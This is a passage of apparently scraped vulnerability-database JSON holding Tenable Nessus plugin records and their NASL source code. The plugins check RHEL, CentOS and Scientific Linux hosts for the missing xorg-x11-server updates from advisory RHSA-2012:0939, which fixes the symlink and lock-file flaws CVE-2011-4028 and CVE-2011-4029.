"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx"], "id": "REDHAT-RHSA-2012-0939.NASL", "href": "https://www.tenable.com/plugins/nessus/59597", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0939. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59597);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_bugtraq_id(50193, 50196);\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"RHEL 6 : xorg-x11-server (RHSA-2012:0939)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4029\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0939\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-devel-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-devel-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xorg-x11-server-source-1.10.6-1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n }\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:27:50", "description": "Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.", "edition": 25, "published": "2012-07-11T00:00:00", "title": "CentOS 6 : xorg-x11-server (CESA-2012:0939)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2012-07-11T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:xorg-x11-server-Xvfb", "p-cpe:/a:centos:centos:xorg-x11-server-Xnest", "p-cpe:/a:centos:centos:xorg-x11-server-common", "p-cpe:/a:centos:centos:xorg-x11-server-Xdmx", "p-cpe:/a:centos:centos:xorg-x11-server-devel", "p-cpe:/a:centos:centos:xorg-x11-server-Xorg", "p-cpe:/a:centos:centos:xorg-x11-server-source", "p-cpe:/a:centos:centos:xorg-x11-server-Xephyr"], "id": "CENTOS_RHSA-2012-0939.NASL", "href": "https://www.tenable.com/plugins/nessus/59932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0939 and \n# CentOS Errata and Security Advisory 2012:0939 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59932);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_bugtraq_id(50193, 50196);\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"CentOS 6 : xorg-x11-server (CESA-2012:0939)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-July/018722.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c991279d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-4029\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-common-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-devel-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-source-1.10.6-1.el6.centos\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:46:42", "description": "X.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nThis update also fixes the following bugs :\n\n - Prior to this update, the KDE Display Manager (KDM)\n could pass invalid 24bpp pixmap formats to the X server.\n As a consequence, the X server could unexpectedly abort.\n This update modifies the underlying code to pass the\n correct formats.\n\n - Prior to this update, absolute input devices, like the\n stylus of a graphic tablet, could become unresponsive in\n the right-most or bottom-most screen if the X server was\n configured as a multi-screen setup through multiple\n 'Device' sections in the xorg.conf file. This update\n changes the screen crossing behavior so that absolute\n devices are always mapped across all screens.\n\n - Prior to this update, the misleading message 'Session\n active, not inhibited, screen idle. If you see this\n test, your display server is broken and you should\n notify your distributor.' could be displayed after\n resuming the system or re-enabling the display, and\n included a URL to an external web page. This update\n removes this message.\n\n - Prior to this update, the erroneous input handling code\n of the Xephyr server disabled screens on a screen\n crossing event. The focus was only on the screen where\n the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a\n multi-screen setup. This update removes this code and\n Xephyr now correctly updates screens in multi-screen\n setups.\n\n - Prior to this update, raw events did not contain\n relative axis values. As a consequence, clients which\n relied on relative values for functioning did not behave\n as expected. This update sets the values to the original\n driver values instead of the already transformed values.\n Now, raw events contain relative axis values as\n expected.\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.", "edition": 16, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : xorg-x11-server on SL6.x i386/x86_64 (20120620)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common"], "id": "SL_20120620_XORG_X11_SERVER_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61351", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61351);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"Scientific Linux Security Update : xorg-x11-server on SL6.x i386/x86_64 (20120620)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"X.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nThis update also fixes the following bugs :\n\n - Prior to this update, the KDE Display Manager (KDM)\n could pass invalid 24bpp pixmap formats to the X server.\n As a consequence, the X server could unexpectedly abort.\n This update modifies the underlying code to pass the\n correct formats.\n\n - Prior to this update, absolute input devices, like the\n stylus of a graphic tablet, could become unresponsive in\n the right-most or bottom-most screen if the X server was\n configured as a multi-screen setup through multiple\n 'Device' sections in the xorg.conf file. This update\n changes the screen crossing behavior so that absolute\n devices are always mapped across all screens.\n\n - Prior to this update, the misleading message 'Session\n active, not inhibited, screen idle. If you see this\n test, your display server is broken and you should\n notify your distributor.' could be displayed after\n resuming the system or re-enabling the display, and\n included a URL to an external web page. This update\n removes this message.\n\n - Prior to this update, the erroneous input handling code\n of the Xephyr server disabled screens on a screen\n crossing event. The focus was only on the screen where\n the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a\n multi-screen setup. This update removes this code and\n Xephyr now correctly updates screens in multi-screen\n setups.\n\n - Prior to this update, raw events did not contain\n relative axis values. As a consequence, clients which\n relied on relative values for functioning did not behave\n as expected. This update sets the values to the original\n driver values instead of the already transformed values.\n Now, raw events contain relative axis values as\n expected.\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1207&L=scientific-linux-errata&T=0&P=1915\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d8997fc7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", 